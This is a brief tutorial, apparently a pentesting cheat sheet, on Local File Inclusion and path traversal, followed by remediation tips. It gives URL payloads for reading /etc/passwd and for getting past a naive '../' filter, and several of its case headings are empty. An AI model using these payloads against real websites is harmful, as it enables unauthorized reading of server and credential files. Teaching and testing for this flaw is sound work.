Local File Inclusion

Also known as LFI, when an attacker can get a website to include a file that was not intended to be an option for the application.

Following, we find some ways to leverage this vulnerability:

• Check if parameters in the URL receive the name of a file

#It's searching for a file
http://$url/$query?$param=hola.php
#We can try to access the system files
http://$url/$query?$param=/etc/passwd

---

• When it doesn't work directly, we can try to get to the root folder. This method is also known as Path Traversal.

On Linux server

#We use ../ to get to the root directory
http://$url/$query?$param=../../../../../etc/passwd

On Windows server

It is useful to put as many ../ as possible to get to the root folder

---

• Sometimes, we will need to check the page code to see the input conditions.

Case 1

The code is searching for a file whose name starts with file

Example source code

...
$file = str_replace( array( "../", "..\\" ), "", $file );
...

We can use the \ to bypass this verification

http://$url/$query?$param=..\/..\/..\/..\/etc/passwd

Also if we use ..././ the code will do the replacement and leave us anyway with ../, and we will also bypass this verification

http://$url/$query?$param=..././..././..././..././etc/passwd
http://$url/$query?$param=....//....//....//etc/passwd

Case 2

Case 3

Case 4

Remediation Actions

• Avoid passing user-supplied input to filesystem APIs

  • Validate the user input before processing it, for example, compare the user input with a whitelist of permitted values

• Sanitize input by allowing only expected characters like alphanumeric only, no dots, slashes, or protocols

• Ensure proper file path resolution and canonicalize the path